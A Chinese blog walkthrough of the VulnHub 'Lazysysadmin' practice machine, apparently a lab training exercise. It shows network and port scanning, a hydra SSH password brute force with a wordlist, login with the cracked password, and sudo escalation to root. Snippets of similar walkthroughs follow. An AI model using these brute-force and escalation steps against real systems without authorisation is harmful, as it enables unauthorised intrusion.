Lazysysadmin

于 2024-09-27 09:00:00 发布
阅读量262 收藏 2
点赞数 7
文章标签: 网络安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_78080214/article/details/142532995
版权

下载地址

https://download.vulnhub.com/lazysysadmin/Lazysysadmin.zip

信息收集

主机发现

arp-scan -l

端口扫描

nmap -sS -sV -sC -O -T5  -Pn -p- 192.168.0.136

目录扫描

dirsearch -u http://192.168.0.136/

漏洞利用

首先看一下robots文件,但是disallow:

根据提示的路径逐个访问,没啥东西:

另外还发现phpmyadmin,测试一波弱口令,失败了,好像连数据库都没配置好

最后还有一个wordpress进去看一下,反复提示了一个togie用户:

逛了一圈暂时没想到可利用的漏洞,只得到了一个用户togie,只能在端口找线索

Getshell

ssh弱口令

开放了22端口,用刚刚的togie用户爆一下ssh弱口令:

hydra -l togie -P /usr/share/wordlists/rockyou.txt -t 2 -vV -e ns 192.168.0.136 ssh

得到密码12345

进行ssh连接

ssh togie@192.168.0.136
得到密码:12345

提权

whoami
id
sudo -l

发现对所有文件的权限都开放,那就简单

直接、

sudo su
whoami

提权成功啦!!!

其实这个非常简单,就是爆破弱口令,还可以试试其它的方法!!

sloth..
关注
打靶练习之--LazysysAdmin靶机
qq_34094920的博客
12-12 1065
渗透机IP:192.168.1.108目标靶机IP:192.168.1.106任务通过渗透机进入目标主机 获取flag。
lazysysadmin靶机
weixin_48923885的博客
07-04 603
首先是采用不同的扫描器先扫网段在扫端口,都扫完了,看看开了什么服务。先试一下80端口,毕竟是有界面的,但是相对麻烦,个人感觉毕竟是通过web应用来连接,不如ssh远程来的快再试一下22端口,ssh链接,使用了九头蛇暴力破解账号密码,原因是弱口令密码,链接上一本万利,可以节省很多步骤再就是139端口,可以共享文件夹,找到了Admin的密码以及方便80端口配置404页面别人都是根据经验经验来的,所以要多打靶,多练习多实践。
Lazysysadmin靶场
堃小杨的博客
03-12 254
该靶机的重点在与信息收集,把细节的敏感文件都记录下来,以便于后期的利用。。。
Lazysysadmin靶机笔记
LINGX5的博客
08-10 1173
我们显示用nmap扫描发现目标开放了22,80,139,445等端口的服务,根据优先级,优先选择web的端口通过漏洞脚本的扫描我们发现了一些web的路径,通过一个一个的访问,我们发现了一个可能的用户名togie,以及wordpress和phpmyadmin的登陆框我们利用smb服务发现了togie用户的密码,以及wp的用户名和密码。通过ssh或者wp的反弹shell,成功获得立足点利用sudo /bin/bash 命令进行提权到root,拿到flagproof.txt文件ds,
Lazysysadmin靶机
zdd1453691081的博客
08-08 165
【代码】Lazysysadmin靶机。
lazysysadmin靶机攻略
weixin_43179779的博客
01-30 251
lazysysadmin
Vulnhub之Lazysysadmin靶场
ierciyuan的博客
10-18 1487
Lazysysadmin靶场实战,ssh弱口令+提权,成功拿到flag
Lazysysadmin靶机渗透过程
0of_blog
04-28 908
提示更新成功,接下来访问hello.php文件,位置:/wordpress/wp-content/plugins/hello.php。查看用户看到了togie账号,结合到前面页面上重复多遍的My name is togie和 之前看到密码是12345的文件。首先去查看WP的配置文件,一般里面会有连接数据库的密码。猜测这是这位的账号密码,刚好开着ssh账号,试着登录。已有sudo权限,至此,对靶机的渗透结束。有phpmyadmin,但不知道密码。列出分享目录的列表,没有密码,直接回车。
Lazysysadmin靶机复盘
2301_79118231的博客
09-30 104
Lazysysadmin靶机复盘个人笔记。
Lazysysadmin 靶场.zip
12-22
Lazysysadmin 靶场.zip
靶机渗透(一)Lazysysadmin
qq_42180996的博客
04-26 4288
靶机Lazysysadmin 一、实验环境 二、实验步骤 (一)信息收集 1.查询测试机IP地址,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/namp) (二)漏洞扫描 1.开启nessusd服务,加载插件,登录 2.建立扫描 3.扫描结果 (三)ssh爆破(22端口) 1.启动msf终端 2.搜索ssh_login的相关工具...
lazysysadmin渗透测试
ITgougou_的博客
11-02 302
环境:攻击机,靶机全部桥接运行于Virtual Box 靶机IP:172.20.120.131 攻击机:kali 172.20.120.243 信息收集 不多说首先dirb目录遍历 这里得到了一些敏感页面信息: 包括phpmyadmin,robots.txt,wordpress, 不急,这里先放着 其中在robots.txt中发现以下目录,试了下前几个都没用,进入/Backnode_files中发现以下目录, 里面包含的就是网站的背景文件之类的,再找 从S...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8471
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全详解
weidl001的博客
09-21 1400
网络安全(Cybersecurity)是指保护网络系统、设备、程序及数据免受攻击、损坏或未授权访问的实践。其核心目标是确保信息的机密性、完整性和可用性。机密性(Confidentiality):确保信息仅被授权的人员访问。完整性(Integrity):保护信息不被未授权的修改或破坏。可用性(Availability):确保信息和资源在需要时可被访问和使用。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-24 625
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全证书考取相关知识
aa98865646的博客
09-21 629
作者是个想进入网络安全行业发展的小白,目前没啥钱,是想自学以后挖漏洞赚钱的,看了这两个算是比较常见的证书看起来都要花不少钱的话,我感觉自己还是先自学一段时间再说吧,实战更重要,这些证书等以后有机会慢慢考吧,如果需要的话。欢迎大佬补充其他适合小白考取的证书,目前感觉4800+480的NISP一级证书比较适合在学校的小白,CISP的话再NISP考到二级以后再加钱4000就可以换成CISP了,NISP适合学生,CISP适合职场啊,不过都是要钱啊。
国产操作系统(统信UOS)网络安全等级保护基础安全加固
2401_84434570的博客
09-26 552
统一操作系统UOS是由多家企业共同打造的中文国产操作系统。一、设置口令复杂度策略和有效期首先安装libpam-pwquality依赖包口令复杂度策略通过libpam-pwquality依赖包进行设置依赖包的安装命令:sudo apt-get install libpam-pwquality。依赖包的查看方式执行命令:dpkg -l libpam-pwquality。执行命令:vim etc/pam.d/common-passwd。
网络安全全方略
AI逍遥子
09-25 1077
网络安全全方略是一个系统化、全面化的过程,涉及策略制定、技术实施、管理流程、技术维护和文化建设等多个方面。通过构建一个全方位、多层次的网络安全防护体系,可以有效保护网络系统、数据和服务免受各种威胁,保业务的连续性和数据的完整性。
19、网络安全合规复盘
最新发布
weixin_43263566的博客
09-26 97
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值